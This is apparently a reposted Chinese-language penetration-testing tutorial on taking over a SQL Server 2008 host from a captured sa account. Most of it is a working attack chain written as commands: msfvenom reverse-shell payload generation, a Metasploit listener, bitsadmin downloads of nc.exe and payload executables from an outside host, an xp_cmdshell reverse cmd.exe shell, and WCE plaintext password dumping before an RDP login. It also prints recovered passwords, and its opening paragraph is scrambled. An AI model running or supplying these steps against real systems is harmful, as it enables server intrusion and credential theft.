快捷搜索:  汽车  科技
当前位置: 爱玩科技 > 生活 > 正文

sqlserver2008代码编写:SQLServer2008另类提权思路

小君 725

sqlserver2008代码编写:SQLServer2008另类提权思路set payload windows/meterpreter/reverse_tcp show options set lhost 192.168.52.215 set lport 4433 run 0 如果shell成功反弹,这可以得到一个shell。./msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.52.215 lport=4433 -f exe -o /tmp/my_payload.exe (2)在msf上面执行1.使用msf生成exe文件并接受监听(1)生成反弹exeLinux msf环境监听4433端口,本机IP为192.168.52.215,牛人一般用这种模式,其利用环境需要在有独立IP的情况下,或者通过代理进入了内网中。

环境情况,获取了对方MSSQL的sa账号及口令,通过sql查询分析器,可以连接,但无法查看用户表及数据,如图1所示,查询后出现SQL查询分析报错,这时候使用常规思路显然是无法进行渗透了,换一种思路海阔天空!

sqlserver2008代码编写:SQLServer2008另类提权思路(1)

图1sql查询器查询报错

1.1.1生成反弹可执行文件

在kali中通过msfvenom生成反弹的可执行文件。

1.使用msf生成exe文件并接受监听

(1)生成反弹exe

Linux msf环境监听4433端口,本机IP为192.168.52.215,牛人一般用这种模式,其利用环境需要在有独立IP的情况下,或者通过代理进入了内网中。

./msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.52.215 lport=4433 -f exe -o /tmp/my_payload.exe

(2)在msf上面执行

set payload windows/meterpreter/reverse_tcp show options set lhost 192.168.52.215 set lport 4433 run 0

如果shell成功反弹,这可以得到一个shell。

2.windows下监听4433端口

(1)msfvenom中的平台参数(-p)可以设置为以下的一些,也可以使用msfvenom -l payload | grep 'reverse'进行查看和选择,建议使用以下一些tcp反弹的shell模块:

windows/shell/reverse_tcp windows/x64/shell_reverse_tcp windows/shell_reverse_tcp windows/shell/reverse_tcp

在msfvenom中可以使用以下命令查看详细的配置选项:

msfvenom -p windows/meterpreter/reverse_tcp --payload-options

(2)生成反弹exe

./msfvenom -p windows/shell/reverse_tcp –a x86_64 lhost=192.168.52.215 lport=4433 -f exe -o /tmp/w.exe

(3)将生成的/tmp/my_payload.exe上传到目标计算机上执行后即可得到反弹的shell,本例中指定一个具有外网独立的IP,然后生成ma.exe。

1.1.2上传文件

在有webshell的情况下可以通过webshell进行上传,在无webshell的情况下,如果是windows2008及以上版本可以使用bitsadmin来上传文件。

1.执行bitsadmin有一定的权限

C:\Windows\System32>cacls bitsadmin.exe C:\Windows\System32\bitsadmin.exe NT SERVICE\TrustedInstaller:F BUILTIN\Administrators:R NT AUTHORITY\SYSTEM:R BUILTIN\Users:R

2.查看Background Intelligent Transfer Service服务

通过SQL查询分析器,在其中执行“exec xp_cmdshell ‘ net start’”命令来查看系统目前服务中是否开启了“Background Intelligent Transfer Service”,如图2所示,在其中发现该服务已经开启,还可以直接执行命令获取:

net start | find "Background Intelligent Transfer Service"

sqlserver2008代码编写:SQLServer2008另类提权思路(2)

图2查看Background Intelligent Transfer Service服务

3.上传nc程序

在实际渗透过程中如果没有木马,可以使用nc.exe程序来代替,使用bitsadmin(对应服务Background Intelligent Transfer Service)来上传文件的命令如下:

(1)bitsadmin /transfer n http://www.antian365.com/lab/nc.exe c:\ma.exe

(2)bitsadmin /transfer myjob1 /download /priority normal http://www.antian365.com/lab/4433.exe c:\ma.exe

在sql查询分析器中执行上面的语句来上传文件,效果如图3所示。

sqlserver2008代码编写:SQLServer2008另类提权思路(3)

图3上传木马程序

还可以直接下载wce压缩文件:

bitsadmin /transfer normal http://www.ampliasecurity.com/research/wce_v1_42beta_x32.zip

bitsadmin /transfer normal http://www.ampliasecurity.com/research/wce_v1_42beta_x64.zip

4.查看上传的文件

在其中执行“exec xp_cmdshell ‘dir c:\’”命令如图4所示,ma.exe已经成功在系统盘下生成,对比文件大小,正确无误上传!

sqlserver2008代码编写:SQLServer2008另类提权思路(4)

图4查看文件是否正确成功上传

1.11.3运行反弹程序成功获取系统权限

1.在反弹监听服务器上执行监听命令

在反弹服务器上面执行监听命令“nc –vv –l –p 4433”,如图5所示,然后再在sql查询分析器中执行命令:

exec xp_cmdshell ‘c:\ma.exe –nv 127.0.0.1 4433 –e C:\windows\system32\cmd.exe’

在反弹的终端中执行whoami命令,获取系统权限,然后执行systeminfo命令,获取系统基本信息,如图5所示,系统为windows2008 sp2 server,没有显示64位,则服务器为32位的可能性最大。

sqlserver2008代码编写:SQLServer2008另类提权思路(5)

图5获取反弹系统shell

sqlserver2008代码编写:SQLServer2008另类提权思路(6)

图6查看服务器情况

1.11.4获取服务器权限

获取反弹shell后可以通过查看系统补丁开启情况,通过exp进行提权。如果是系统权限则直接通过wce获取系统明文密码。

1.获取明文密码

继续通过bitsadmin上传wce32.exe,上传后,直接执行“wce32 –w”命令来获取系统当前的登录明文密码“cql?1575DONGLI”,如图7所示。

sqlserver2008代码编写:SQLServer2008另类提权思路(7)

图7获取明文密码

技巧:

wce获取明文密码必须是system权限下,有时候通过添加管理员帐号权限用户登录系统后,由于系统权限限制,可能无法通过执行wce来直接获取明文密码。则时候可以通过具备系统权限的工具来执行,比如具备系统权限的mssql命令执行,mysql数据库root账号来执行等。

2.登录3389

使用远程终端,输入获取的密码,直接登录对方服务器,如图8所示。

sqlserver2008代码编写:SQLServer2008另类提权思路(8)

图8登录远程终端

3.打开SQL Server管理器,如图9所示,成功进行查询。获取管理员密码为y8zZ HiAaG1RiPdfxR4 ZiRQOr9 b6zs。

sqlserver2008代码编写:SQLServer2008另类提权思路(9)

图9成功查询数据库

作者简介:陈小兵,原海军某部网络安全研究员、公安部网络安全攻防实验员、曾就职于北京公安局网络安全总队,北理工计算机学院在读博士;主要从事网络安全攻防研究工作,在网络安全研究与培训、病毒防范、网络渗透等领域具有20年以上经验,在业内享有盛名。

2018年受DEFON GROUP 010(https://www.anquanke.com/post/id/101477)邀请在上海黑客沙龙做《内网渗透思路》主题分享(视频观看地址https://www.ichunqiu.com/open/61711),已出版《SQL Server2000培训教程》《黑客攻防及实战案例解析》《Web渗透及实战案例解析》《安全之路-Web渗透及实战案例解析第二版》、《黑客攻防实战加密与解密》、《网络攻防实战研究:漏洞利用与提权》、2019年待出版《网络攻防实战研究:MySQL数据库攻击与防御》、《网络攻防实战研究:攻防实战技术》、《web服务器渗透实战》《SQLMAP从入门到精通》共计10本专著,在国内核心期刊及普通学术期刊发表论文20余篇,曾在《黑客防线》、《黑客X档案》、《网管员世界》、《开放系统及世界》、《视窗世界》等杂志发表文章100余篇。 国内著名权威技术51cto网站专栏作者,技术专家,讲师,目前在51cto开设有两个付费专栏:

(1)SQLMAP从入门到精通:http://blog.51cto.com/cloumn/detail/3

(2)Web网站安全评估分析及防御:https://blog.51cto.com/cloumn/detail/15

个人访问量超过640万博客:http://blog.51cto.com/simeon

FreeBuf个人专栏https://www.freebuf.com/author/simeon

CSDN付费专栏:《密码安全攻防技术精讲》

https://gitbook.cn/gitchat/column/5afbf24f753289354cab7983

网站首页

返回栏目

猜您喜欢:

相关文章